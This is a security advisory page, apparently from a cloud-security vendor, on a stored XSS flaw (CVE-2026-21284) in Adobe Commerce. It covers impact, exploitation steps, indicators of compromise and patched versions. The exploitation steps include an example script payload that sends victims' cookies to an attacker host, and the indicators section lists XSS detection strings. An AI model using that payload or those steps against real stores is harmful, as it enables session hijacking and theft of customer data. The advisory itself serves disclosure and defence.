CVE-2026-21284
Adobe Commerce vulnerability analysis and mitigation

Overview

CVE-2026-21284 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a high-privileged attacker to inject malicious scripts into vulnerable form fields. Affected versions include Adobe Commerce 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier, as well as corresponding Adobe Commerce B2B and Magento Open Source releases. The vulnerability was disclosed on March 10–11, 2026, with Adobe releasing a security advisory and patches simultaneously. It carries a CVSS v3.1 base score of 8.1 (High) (Adobe Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A high-privileged attacker can inject malicious JavaScript payloads into vulnerable form fields within the Adobe Commerce administrative interface; these scripts are stored server-side and subsequently executed in the browser of any victim who navigates to the page containing the compromised field. Exploitation requires network access, low attack complexity, and user interaction (a victim must browse to the affected page), but does not require any special conditions beyond the attacker already holding high-privilege credentials. The scope is changed, meaning the injected script executes in the context of the victim's browser session rather than the attacker's (Adobe Advisory).

Impact

Successful exploitation enables session takeover by executing malicious JavaScript in a victim's browser, resulting in high confidentiality and integrity impacts with no availability impact. An attacker who compromises an admin or privileged user session could access sensitive order, customer, and payment data, modify store configurations, or perform unauthorized administrative actions. The changed scope means the impact extends beyond the attacker's own privilege level to affect other authenticated users, including administrators browsing the vulnerable pages (Adobe Advisory).

Exploitation steps

  1. Obtain High-Privileged Access: Gain administrative or high-privileged credentials to the Adobe Commerce backend through phishing, credential stuffing, or other means.
  2. Identify Vulnerable Form Fields: Navigate to administrative form pages (e.g., product descriptions, CMS blocks, customer attributes, or other rich-text fields) that do not properly sanitize input before storing it.
  3. Inject Malicious Payload: Submit a crafted stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save the record.
  4. Wait for Victim Interaction: The payload is now persisted in the database. When any user (including other admins or customers) browses to the page rendering the compromised field, the malicious script executes in their browser.
  5. Achieve Session Takeover: The script exfiltrates the victim's session cookie or authentication token to an attacker-controlled server, enabling the attacker to hijack the session and perform actions on behalf of the victim (Adobe Advisory).

Indicators of compromise

  • Logs: Unexpected or encoded JavaScript strings (e.g., <script>, javascript:, onerror=, document.cookie) appearing in Adobe Commerce admin access logs or database audit logs for form field submissions.
  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after accessing specific admin or storefront pages; look for requests containing cookie or session data in query parameters.
  • File System: Unusual modifications to CMS block content, product descriptions, or attribute values in the database containing script tags or encoded payloads.
  • Browser/Application: Unexpected redirects or pop-ups when administrators or users access specific Commerce pages; browser developer tools showing script execution from unexpected inline sources.

Mitigation and workarounds

Adobe has released patched versions addressing this vulnerability. Users should upgrade to the following or later versions: Adobe Commerce 2.4.4-p17, 2.4.5-p16, 2.4.6-p14, 2.4.7-p9, 2.4.8-p4, or 2.4.9-alpha4 (or later). As interim mitigations, administrators should implement Content Security Policy (CSP) headers to restrict inline script execution, limit administrative access to only users who genuinely require it, and monitor form submissions and access logs for suspicious activity. Upgrading to a patched release is the recommended and definitive remediation (Adobe Advisory).

Community reactions

The vulnerability was covered as part of Adobe's broader March 2026 patch release, which addressed approximately 80 vulnerabilities across eight products. CIS Security issued an advisory noting multiple vulnerabilities in Adobe products could allow for arbitrary code execution. Security community coverage was largely routine, with aggregators such as RedPacket Security and threat intelligence platforms indexing the CVE shortly after disclosure. No notable independent researcher commentary or significant social media discussion specific to this CVE was identified beyond standard patch-Tuesday coverage.

Additional resources


SourceThis report was generated using AI

Related Adobe Commerce vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-48358CRITICAL10
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48356CRITICAL9.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48000MEDIUM6.1
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48371MEDIUM5.4
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48001LOW3.7
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management